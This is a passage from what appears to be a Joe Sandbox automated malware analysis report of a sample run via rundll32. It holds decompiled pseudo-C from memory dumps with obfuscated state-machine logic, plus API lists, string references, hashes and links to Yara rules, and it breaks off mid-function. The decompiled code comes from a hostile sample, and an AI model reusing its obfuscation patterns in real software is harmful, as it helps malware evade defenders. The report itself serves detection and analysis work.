0x10030e29
0x10030e10
0x10030e13
0x00000000
0x00000000
0x10030e19
0x00000000
0x10030e19
0x10030dc9
0x10030dcc
0x00000000
0x00000000
0x10030dd2
0x00000000
0x10030dd2

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,70D9FFF6,?,1000F7D4,70D9FFF6,?,00000000,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10024059

Part of subcall function 10023FB6: _free.LIBCMT ref: 10024018
Part of subcall function 10023FB6: _free.LIBCMT ref: 1002404E

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 10030E4A
IsValidCodePage.KERNEL32(00000000), ref: 10030E93
IsValidLocale.KERNEL32(?,00000001), ref: 10030EA2
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 10030EEA
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 10030F09

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: e652cf197484474aa77ee004c84c2ce9e9808f2ca160c0f0c27b475b69f1c72a
Instruction ID: 5d274e936d606ac0d18be7e6a8d0ab20f0ec1e67d6cbe38ebf8b77e0045353eb
Opcode Fuzzy Hash: e652cf197484474aa77ee004c84c2ce9e9808f2ca160c0f0c27b475b69f1c72a
Instruction Fuzzy Hash: 8951B171A01219AFEB02DFA5CD51AAEB3F8EF09742F010869F914EF151E771EA40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B21280, Relevance: 7.7, Strings: 6, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00B21280(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t124;
				void* _t136;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				void* _t149;
				void* _t170;
				void* _t172;
				void* _t173;

				_push(_a16);
				_t169 = _a8;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t124);
				_v112 = 0x527a;
				_t173 = _t172 + 0x18;
				_v112 = _v112 + 0x9ab3;
				_t170 = 0;
				_t149 = 0x18640a1d;
				_t144 = 0x56;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x0028d5a0;
				_v84 = 0xce56;
				_v84 = _v84 | 0x89224a79;
				_v84 = _v84 ^ 0x8922db02;
				_v124 = 0x8cd1;
				_v124 = _v124 ^ 0x879587c2;
				_v124 = _v124 | 0xdff4f7f6;
				_v124 = _v124 ^ 0xdff58592;
				_v80 = 0x5082;
				_v80 = _v80 * 5;
				_v80 = _v80 ^ 0x0001dd7a;
				_v100 = 0x94cc;
				_v100 = _v100 >> 1;
				_v100 = _v100 + 0xc5d3;
				_v100 = _v100 ^ 0x0001674a;
				_v104 = 0x7528;
				_v104 = _v104 | 0x4afc80c9;
				_v104 = _v104 * 0x41;
				_v104 = _v104 ^ 0x0a3a6635;
				_v108 = 0x5a30;
				_v108 = _v108 >> 6;
				_t145 = 0x51;
				_v108 = _v108 / _t144;
				_v108 = _v108 ^ 0x00000b43;
				_v128 = 0x7a75;
				_v128 = _v128 ^ 0x183e3e2b;
				_v128 = _v128 >> 0xe;
				_v128 = _v128 << 1;
				_v128 = _v128 ^ 0x0000b567;
				_v88 = 0xd0b6;
				_v88 = _v88 << 2;
				_v88 = _v88 ^ 0x0003606d;
				_v92 = 0x29e5;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0x29e559c0;
				_v116 = 0xa20c;
				_v116 = _v116 / _t145;
				_v116 = _v116 << 1;
				_v116 = _v116 ^ 0x00003b63;
				_v120 = 0xbe93;
				_v120 = _v120 | 0x1a4ed6db;
				_v120 = _v120 + 0xa009;
				_v120 = _v120 + 0xfffff07c;
				_v120 = _v120 ^ 0x1a4feb5f;
				_v96 = 0x4975;
				_t146 = 0x2b;
				_v96 = _v96 * 0x31;
				_v96 = _v96 / _t146;
				_v96 = _v96 ^ 0x000025f7;
				do {
					while(_t149 != 0x1a9c3b7) {
						if(_t149 == 0xb87d72f) {
							__eflags = E00B2B055(_v120, _v96, __eflags,  &_v76, _t169 + 8);
							_t170 =  !=  ? 1 : _t170;
						} else {
							if(_t149 == 0x18640a1d) {
								_t149 = 0x1a19e858;
								continue;
							} else {
								if(_t149 == 0x1a19e858) {
									E00B350F2( &_v76, _v112, _v84, _v124, _a12);
									_t173 = _t173 + 0xc;
									_t149 = 0x1a9c3b7;
									continue;
								} else {
									if(_t149 != 0x2b3c78b1) {
										goto L13;
									} else {
										_t143 = E00B38F11( &_v76, _v128, _v88, _t169 + 4, _v92, _v116);
										_t173 = _t173 + 0x10;
										if(_t143 != 0) {
											_t149 = 0xb87d72f;
											continue;
										}
									}
								}
							}
						}
						L16:
						return _t170;
					}
					_t136 = E00B38F11( &_v76, _v80, _v100, _t169, _v104, _v108);
					_t173 = _t173 + 0x10;
					__eflags = _t136;
					if(__eflags == 0) {
						_t149 = 0x1a747795;
						goto L13;
					} else {
						_t149 = 0x2b3c78b1;
						continue;
					}
					goto L16;
					L13:
					__eflags = _t149 - 0x1a747795;
				} while (__eflags != 0);
				goto L16;
			}

0x00b2128a
0x00b21291
0x00b21298
0x00b2129f
0x00b212a0
0x00b212a7
0x00b212a8
0x00b212a9
0x00b212ae
0x00b212b6
0x00b212b9
0x00b212c8
0x00b212ca
0x00b212d1
0x00b212d4
0x00b212d8
0x00b212e0
0x00b212e8
0x00b212f0
0x00b212f8
0x00b21300
0x00b21308
0x00b21310
0x00b21318
0x00b21325
0x00b21329
0x00b21331
0x00b21339
0x00b2133d
0x00b21345
0x00b2134d
0x00b21355
0x00b21362
0x00b21366
0x00b2136e
0x00b21376
0x00b21381
0x00b21382
0x00b21388
0x00b21390
0x00b21398
0x00b213a0
0x00b213a5
0x00b213a9
0x00b213b1
0x00b213b9
0x00b213be
0x00b213c6
0x00b213ce
0x00b213d3
0x00b213db
0x00b213eb
0x00b213ef
0x00b213f3
0x00b213fb
0x00b21403
0x00b2140b
0x00b21413
0x00b2141b
0x00b21423
0x00b21432
0x00b21433
0x00b21447
0x00b2144b
0x00b21453
0x00b21453
0x00b2145d
0x00b2152a
0x00b2152c
0x00b21463
0x00b21469
0x00b214cd
0x00000000
0x00b2146b
0x00b2146d
0x00b214be
0x00b214c3
0x00b214c6
0x00000000
0x00b2146f
0x00b21475
0x00000000
0x00b2147b
0x00b21493
0x00b21498
0x00b2149d
0x00b214a3
0x00000000
0x00b214a3
0x00b2149d
0x00b21475
0x00b2146d
0x00b21469
0x00b21530
0x00b2153b
0x00b2153b
0x00b214e6
0x00b214eb
0x00b214ee
0x00b214f0
0x00b214fc
0x00000000
0x00b214f2
0x00b214f2
0x00000000
0x00b214f2
0x00000000
0x00b21501
0x00b21501
0x00b21501
0x00000000

Strings

5f:, xrefs: 00B21366
zR, xrefs: 00B212AE
uI, xrefs: 00B21423
0Z, xrefs: 00B2136E
uz, xrefs: 00B21390
c;, xrefs: 00B213F3

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0Z$5f:$c;$uI$uz$zR
API String ID: 0-4070947617
Opcode ID: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
Instruction ID: 4b1d59867f6f4da1d8485e1d4180591da399c739dd91d0ca70ff2911500b85a3
Opcode Fuzzy Hash: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
Instruction Fuzzy Hash: 4B617671109340AFD758DE24D98591FBBF1FBD9708F80591DF19A862A0D7BACA088F43

Uniqueness

Uniqueness Score: -1.00%

Function 00B217AC, Relevance: 7.7, Strings: 6, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00B217AC(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* __ecx;
				void* _t124;
				intOrPtr _t144;
				void* _t148;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				signed int* _t175;

				_push(_a20);
				_push(1);
				_push(1);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00B2602B(_t124);
				_v48 = 0x839b;
				_t175 =  &(( &_v52)[7]);
				_t172 = 0;
				_t148 = 0xc9f1fee;
				_t167 = 0x65;
				_v48 = _v48 / _t167;
				_v48 = _v48 + 0xffff5433;
				_t168 = 0x4c;
				_v48 = _v48 / _t168;
				_v48 = _v48 ^ 0x035e614e;
				_v52 = 0x7a24;
				_t169 = 0x57;
				_v52 = _v52 * 0x3d;
				_v52 = _v52 / _t169;
				_v52 = _v52 | 0x143fc393;
				_v52 = _v52 ^ 0x143ff5ea;
				_v32 = 0x6195;
				_v32 = _v32 ^ 0x160f1dee;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x2c1ed936;
				_v44 = 0xc7f4;
				_v44 = _v44 + 0xffff31e5;
				_v44 = _v44 | 0xcdfc86d8;
				_v44 = _v44 + 0xffff4cbe;
				_v44 = _v44 ^ 0xffff1878;
				_v12 = 0x3e0d;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x0003ab13;
				_v24 = 0xe2a2;
				_t170 = 0x4a;
				_v24 = _v24 * 0x7d;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0006fa2b;
				_v16 = 0xd6eb;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x0000394e;
				_v40 = 0x5ece;
				_v40 = _v40 * 0x43;
				_v40 = _v40 / _t170;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0x000003d1;
				_v28 = 0xdfec;
				_v28 = _v28 >> 6;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x001be0b4;
				_v20 = 0x73b;
				_v20 = _v20 ^ 0xd6615083;
				_v20 = _v20 ^ 0xd6610707;
				_v36 = 0x46b8;
				_v36 = _v36 | 0xf1966772;
				_v36 = _v36 ^ 0x374c3a36;
				_v36 = _v36 * 0x27;
				_v36 = _v36 ^ 0x4b440184;
				_v8 = 0xd697;
				_v8 = _v8 ^ 0x6f8084df;
				_v8 = _v8 ^ 0x6f807f26;
				_t171 = _v4;
				while(_t148 != 0x24e4c4b) {
					if(_t148 == 0xc9f1fee) {
						_t148 = 0x3ad8e818;
						continue;
					} else {
						if(_t148 == 0x1ffca7a2) {
							E00B31AB6(1, _v12, _t148, _a20, 1, _v24, _v16, _v4, _a4, _v40, _v28, _v20);
							_t175 =  &(_t175[0xa]);
							_t148 = 0x24e4c4b;
							_t172 =  !=  ? 1 : _t172;
							continue;
						} else {
							if(_t148 == 0x34494570) {
								if(E00B30729(_v32,  &_v4, _v44, _t171) != 0) {
									_t148 = 0x1ffca7a2;
									continue;
								}
							} else {
								if(_t148 != 0x3ad8e818) {
									L13:
									if(_t148 != 0x2a0664e6) {
										continue;
									}
								} else {
									_t144 = E00B2F6DF(_t148);
									_t171 = _t144;
									if(_t144 != 0xffffffff) {
										_t148 = 0x34494570;
										continue;
									}
								}
							}
						}
					}
					return _t172;
				}
				E00B34F7D(_v36, _v8, _v4);
				_t148 = 0x2a0664e6;
				goto L13;
			}

0x00b217b3
0x00b217ba
0x00b217bb
0x00b217bc
0x00b217c0
0x00b217c4
0x00b217c6
0x00b217cb
0x00b217d3
0x00b217dc
0x00b217de
0x00b217e5
0x00b217ea
0x00b217f0
0x00b217fc
0x00b21801
0x00b21807
0x00b2180f
0x00b2181c
0x00b2181f
0x00b2182b
0x00b2182f
0x00b21837
0x00b2183f
0x00b21847
0x00b2184f
0x00b21853
0x00b2185b
0x00b21863
0x00b2186b
0x00b21873
0x00b2187b
0x00b21883
0x00b2188b
0x00b21890
0x00b21898
0x00b218a5
0x00b218a6
0x00b218aa
0x00b218af
0x00b218b7
0x00b218bf
0x00b218c4
0x00b218cc
0x00b218d9
0x00b218e3
0x00b218e7
0x00b218ec
0x00b218f4
0x00b218fc
0x00b21901
0x00b21906
0x00b2190e
0x00b21916
0x00b2191e
0x00b21926
0x00b21933
0x00b2193b
0x00b21948
0x00b2194c
0x00b21954
0x00b2195c
0x00b21964
0x00b2196c
0x00b21970
0x00b21982
0x00b21a1a
0x00000000
0x00b21988
0x00b2198a
0x00b21a03
0x00b21a08
0x00b21a0b
0x00b21a12
0x00000000
0x00b2198c
0x00b21992
0x00b219d5
0x00b219d7
0x00000000
0x00b219d7
0x00b21994
0x00b2199a
0x00b21a3b
0x00b21a41
0x00000000
0x00000000
0x00b219a0
0x00b219a8
0x00b219ad
0x00b219b2
0x00b219b8
0x00000000
0x00b219b8
0x00b219b2
0x00b2199a
0x00b21992
0x00b2198a
0x00b21a50
0x00b21a50
0x00b21a30
0x00b21a36
0x00000000

Strings

6:L7, xrefs: 00B2193B
N9, xrefs: 00B218C4
pEI4, xrefs: 00B2198C
pEI4, xrefs: 00B219B8
$z, xrefs: 00B2180F
>, xrefs: 00B21883

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: >$$z$6:L7$N9$pEI4$pEI4
API String ID: 0-302225334
Opcode ID: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
Instruction ID: c6f6cfeddbbe36b33813d54e9b2f1e2e528447e40115ff8cf7651ed3e68d7b83
Opcode Fuzzy Hash: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
Instruction Fuzzy Hash: 766154711083419FD358CE65D88581FBBE5FBC4358F444A1DF1AA96260C3B5CA4ACF93

Uniqueness

Uniqueness Score: -1.00%

Function 00B320C5, Relevance: 7.6, Strings: 6, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B320C5() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				void* _t124;
				short* _t127;
				void* _t132;
				void* _t134;
				intOrPtr _t150;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t167;
				void* _t169;

				_t169 = (_t167 & 0xfffffff8) - 0x250;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t132 = 0x3ec8c14;
				_v536 = 0x37230;
				_v544 = 0xcdd0;
				_v544 = _v544 >> 7;
				_v544 = _v544 ^ 0x000074a7;
				_v572 = 0xb951;
				_v572 = _v572 + 0xffffa9df;
				_v572 = _v572 ^ 0x00005eca;
				_v584 = 0x3783;
				_v584 = _v584 >> 1;
				_t159 = 0x30;
				_v584 = _v584 / _t159;
				_v584 = _v584 ^ 0x00007df0;
				_v592 = 0x764f;
				_t160 = 0x29;
				_v592 = _v592 * 0x6c;
				_v592 = _v592 + 0xffff1483;
				_v592 = _v592 ^ 0x0030effe;
				_v580 = 0x26e4;
				_v580 = _v580 + 0xffffa17d;
				_v580 = _v580 >> 0xc;
				_v580 = _v580 ^ 0x000fb6a3;
				_v588 = 0x592d;
				_v588 = _v588 * 0x5e;
				_v588 = _v588 + 0xfffff058;
				_v588 = _v588 ^ 0x0020c0b6;
				_v576 = 0x67c6;
				_v576 = _v576 >> 4;
				_v576 = _v576 | 0x70f0481f;
				_v576 = _v576 ^ 0x70f020ed;
				_v568 = 0x5c9a;
				_v568 = _v568 ^ 0x6d262440;
				_v568 = _v568 ^ 0x6d2624e4;
				_v552 = 0x512d;
				_v552 = _v552 / _t160;
				_v552 = _v552 ^ 0x00002fd7;
				_v540 = 0x67a3;
				_v540 = _v540 + 0x741c;
				_v540 = _v540 ^ 0x0000c39d;
				_v560 = 0xac4b;
				_v560 = _v560 | 0x611015d1;
				_v560 = _v560 ^ 0x6110f087;
				_v548 = 0xff97;
				_v548 = _v548 >> 8;
				_v548 = _v548 ^ 0x000016db;
				_v556 = 0xce04;
				_t161 = 0x2b;
				_v556 = _v556 / _t161;
				_v556 = _v556 ^ 0x000048b5;
				_v564 = 0x85d6;
				_v564 = _v564 >> 0xf;
				_v564 = _v564 ^ 0x00007642;
				do {
					while(_t132 != 0x3ec8c14) {
						if(_t132 == 0x4e3e716) {
							_push(_v572);
							_t124 = E00B3889D(0xb3c9b0, _v544, __eflags);
							_pop(_t134);
							_t150 =  *0xb3ca2c; // 0x505cc8
							_t108 = _t150 + 0x230; // 0x6c0053
							E00B2C680(_t108, _v592, _v580, _t134, _v588,  *0xb3ca2c, _t124,  &_v524);
							_t169 = _t169 + 0x1c;
							_t127 = E00B32025(_v576, _t124, _v568, _v552);
							_t132 = 0x36d909ae;
							continue;
						} else {
							if(_t132 == 0x2942dba3) {
								_t127 = E00B32B16(_v548,  &_v524, E00B384CC, _v564, 0,  &_v524);
							} else {
								if(_t132 != 0x36d909ae) {
									goto L8;
								} else {
									_t127 = E00B228CE( &_v524, _v540, _v560);
									 *_t127 = 0;
									_t132 = 0x2942dba3;
									continue;
								}
							}
						}
						L11:
						return _t127;
					}
					_t132 = 0x4e3e716;
					L8:
					__eflags = _t132 - 0x16e8989b;
				} while (__eflags != 0);
				goto L11;
			}

0x00b320cb
0x00b320d1
0x00b320d8
0x00b320dd
0x00b320e2
0x00b320ea
0x00b320f2
0x00b320f7
0x00b320ff
0x00b32107
0x00b3210f
0x00b32117
0x00b3211f
0x00b3212d
0x00b32132
0x00b32138
0x00b32145
0x00b3215c
0x00b3215f
0x00b32163
0x00b3216b
0x00b32173
0x00b3217b
0x00b32183
0x00b32188
0x00b32190
0x00b3219d
0x00b321a1
0x00b321a9
0x00b321b1
0x00b321b9
0x00b321be
0x00b321c6
0x00b321ce
0x00b321d6
0x00b321de
0x00b321e6
0x00b321f6
0x00b321fa
0x00b32202
0x00b3220a
0x00b32212
0x00b3221a
0x00b32222
0x00b3222a
0x00b32232
0x00b3223a
0x00b3223f
0x00b32247
0x00b32253
0x00b32256
0x00b3225a
0x00b32262
0x00b3226a
0x00b3226f
0x00b32277
0x00b32277
0x00b32285
0x00b322ae
0x00b322bb
0x00b322c0
0x00b322dc
0x00b322e6
0x00b322ec
0x00b322f1
0x00b32302
0x00b32309
0x00000000
0x00b32287
0x00b32289
0x00b32339
0x00b3228f
0x00b32291
0x00000000
0x00b32293
0x00b3229f
0x00b322a7
0x00b322aa
0x00000000
0x00b322aa
0x00b32291
0x00b32289
0x00b32341
0x00b32348
0x00b32348
0x00b32310
0x00b32312
0x00b32312
0x00b32312
0x00000000

Strings

-Y, xrefs: 00B32190
Bv, xrefs: 00B3226F
&, xrefs: 00B32173
Ov, xrefs: 00B32145
$&m, xrefs: 00B321DE
-Q, xrefs: 00B321E6

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -Q$-Y$Bv$Ov$$&m$&
API String ID: 0-2434786051
Opcode ID: 549260f2a09c60ed1507933c76598fffc977bd7aff752739fa0bd5b6c7f2da48
Instruction ID: 362f0095c781b48da61b224398e6ffba606c31c1d608519cb3b2fa1a97197ea4
Opcode Fuzzy Hash: 549260f2a09c60ed1507933c76598fffc977bd7aff752739fa0bd5b6c7f2da48
Instruction Fuzzy Hash: 2A515771508340AFD368DF25C88A91BBBF1FBC4368F609A5DF585862A0C7B58949CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00B2839D, Relevance: 6.4, Strings: 5, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00B2839D(void* __ecx, void* __edi) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				int _t181;
				signed int _t184;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int _t194;
				void* _t211;
				void* _t215;
				signed int _t217;

				_v28 = 0x5ca2;
				_v28 = _v28 + 0x82ee;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x06fc8008;
				_v52 = 0x31f1;
				_v52 = _v52 * 0x4e;
				_t215 = __ecx;
				_t186 = 0x39;
				_v52 = _v52 * 0x4d;
				_v52 = _v52 >> 7;
				_v52 = _v52 ^ 0x00092748;
				_v20 = 0x7fc5;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x00d59d54;
				_v44 = 0xb39b;
				_v44 = _v44 + 0xf7d;
				_v44 = _v44 | 0x2a7b5142;
				_v44 = _v44 + 0xffff17c4;
				_v44 = _v44 ^ 0x2a7aeb0e;
				_v60 = 0x1587;
				_v60 = _v60 | 0x5979cfaa;
				_v60 = _v60 ^ 0xb2ac8491;
				_v60 = _v60 ^ 0x62b96002;
				_v60 = _v60 ^ 0x896c4508;
				_v16 = 0x3e7;
				_v16 = _v16 | 0x10c95731;
				_v16 = _v16 ^ 0x10c93485;
				_v56 = 0x1ea8;
				_v56 = _v56 << 4;
				_v56 = _v56 << 6;
				_v56 = _v56 / _t186;
				_v56 = _v56 ^ 0x0002353c;
				_v12 = 0x5bc0;
				_t187 = 0x13;
				_v12 = _v12 / _t187;
				_v12 = _v12 ^ 0x00001b6c;
				_v48 = 0x8f53;
				_v48 = _v48 ^ 0x72e3c217;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 ^ 0x701cd0a1;
				_v48 = _v48 ^ 0x7012c214;
				_v24 = 0xa180;
				_v24 = _v24 | 0x7584ea2b;
				_v24 = _v24 + 0x36fb;
				_v24 = _v24 ^ 0x75854120;
				_v32 = 0x424b;
				_v32 = _v32 ^ 0x8f16dfbf;
				_v32 = _v32 << 0xc;
				_v32 = _v32 + 0xffffa50c;
				_v32 = _v32 ^ 0x69defe02;
				_v8 = 0x6622;
				_t188 = 0x62;
				_v8 = _v8 / _t188;
				_v8 = _v8 ^ 0x00007651;
				_v36 = 0x9705;
				_t189 = 0x5a;
				_v36 = _v36 * 0x11;
				_v36 = _v36 / _t189;
				_v36 = _v36 | 0xcd876993;
				_v36 = _v36 ^ 0xcd872ff9;
				_v40 = 0x44cf;
				_v40 = _v40 | 0x3f74ab7e;
				_v40 = _v40 << 1;
				_v40 = _v40 + 0x396f;
				_v40 = _v40 ^ 0x7eea1d0a;
				_v4 = E00B38C8F(_t189);
				_t217 = _v28 + E00B38C8F(_t189) % _v52;
				_t184 = _v20 + E00B38C8F(_v52) % _v44;
				if(_t217 != 0) {
					_t211 = _t215;
					_t194 = _t217 >> 1;
					_t215 = _t215 + _t217 * 2;
					_t181 = memset(_t211, 0x2d002d, _t194 << 2);
					asm("adc ecx, ecx");
					memset(_t211 + _t194, _t181, 0);
				}
				E00B2D6C9(_v8, _t215, 3, _t184, _v36,  &_v4, _v40);
				 *((short*)(_t215 + _t184 * 2)) = 0;
				return 0;
			}

0x00b283a0
0x00b283aa
0x00b283b2
0x00b283b7
0x00b283bf
0x00b283d1
0x00b283d5
0x00b283dc
0x00b283df
0x00b283e3
0x00b283e8
0x00b283f0
0x00b283fd
0x00b28401
0x00b28406
0x00b2840e
0x00b28416
0x00b2841e
0x00b28426
0x00b2842e
0x00b28436
0x00b2843e
0x00b28446
0x00b2844e
0x00b28456
0x00b2845e
0x00b28466
0x00b2846e
0x00b28476
0x00b2847e
0x00b28483
0x00b28490
0x00b28494
0x00b2849c
0x00b284a8
0x00b284ad
0x00b284b3
0x00b284bb
0x00b284c3
0x00b284cb
0x00b284d0
0x00b284d8
0x00b284e0
0x00b284e8
0x00b284f0
0x00b284f8
0x00b28500
0x00b28508
0x00b28510
0x00b28515
0x00b2851d
0x00b28525
0x00b28531
0x00b28536
0x00b2853c
0x00b28544
0x00b28551
0x00b28552
0x00b2855c
0x00b28560
0x00b28568
0x00b28570
0x00b28578
0x00b28580
0x00b28584
0x00b2858c
0x00b285a1
0x00b285c2
0x00b285d9
0x00b285dd
0x00b285e2
0x00b285e4
0x00b285e6
0x00b285ee
0x00b285f0
0x00b285f2
0x00b285f5
0x00b2860f
0x00b28619
0x00b28623

Strings

KB, xrefs: 00B28500
H', xrefs: 00B283E8
o9, xrefs: 00B28584
Qv, xrefs: 00B2853C
BQ{*, xrefs: 00B2841E

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: BQ{*$H'$KB$Qv$o9
API String ID: 0-3657823386
Opcode ID: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
Instruction ID: 0411863573baad031e98086b576062dd1eeeb1e203388f54585fefeef42f3355
Opcode Fuzzy Hash: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
Instruction Fuzzy Hash: 336111701093419FD348CF25D58A50BBBE1FBC8748F509A1DF1DA96260D7B9DA098F86

Uniqueness

Uniqueness Score: -1.00%

Function 00B26754, Relevance: 6.4, Strings: 5, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00B26754(intOrPtr __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				unsigned int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				void* _t96;
				signed int _t97;
				signed int _t101;
				intOrPtr _t104;
				signed int _t106;
				signed int _t107;
				void* _t108;
				signed int _t123;
				void* _t124;
				intOrPtr* _t128;
				signed int* _t129;

				_t129 =  &_v572;
				_v524 = _v524 & 0x00000000;
				_v532 = 0x37527f;
				_v528 = 0x4295e6;
				_v536 = 0xee22;
				_v536 = _v536 >> 0xc;
				_v536 = _v536 ^ 0x00007a3a;
				_v544 = 0x8f72;
				_v544 = _v544 | 0xa1a2610a;
				_v544 = _v544 ^ 0xa1a2ad19;
				_v540 = 0xc65b;
				_v540 = _v540 << 9;
				_v540 = _v540 ^ 0x018ca8d5;
				_v572 = 0x4354;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff6940;
				_v572 = _v572 * 0x52;
				_t128 = __edx;
				_v572 = _v572 ^ 0xb1ecefd2;
				_v552 = 0x7a0c;
				_t104 = __ecx;
				_v552 = _v552 | 0xfffddbf7;
				_t124 = 0x1663684c;
				_v552 = _v552 ^ 0xfffd8a47;
				_v568 = 0x9348;
				_t106 = 0xf;
				_v568 = _v568 * 0x32;
				_v568 = _v568 + 0x92e3;
				_v568 = _v568 * 0x69;
				_v568 = _v568 ^ 0x0c08d7a0;
				_v556 = 0x9f50;
				_v556 = _v556 / _t106;
				_v556 = _v556 >> 2;
				_v556 = _v556 ^ 0x000022d0;
				_v548 = 0xa3e1;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 ^ 0x000031bd;
				_v564 = 0x55b6;
				_v564 = _v564 >> 1;
				_v564 = _v564 + 0xaf4f;
				_t107 = 0x5e;
				_t123 = _v548;
				_v564 = _v564 / _t107;
				_v564 = _v564 ^ 0x0000417a;
				_v560 = 0xe775;
				_v560 = _v560 << 4;
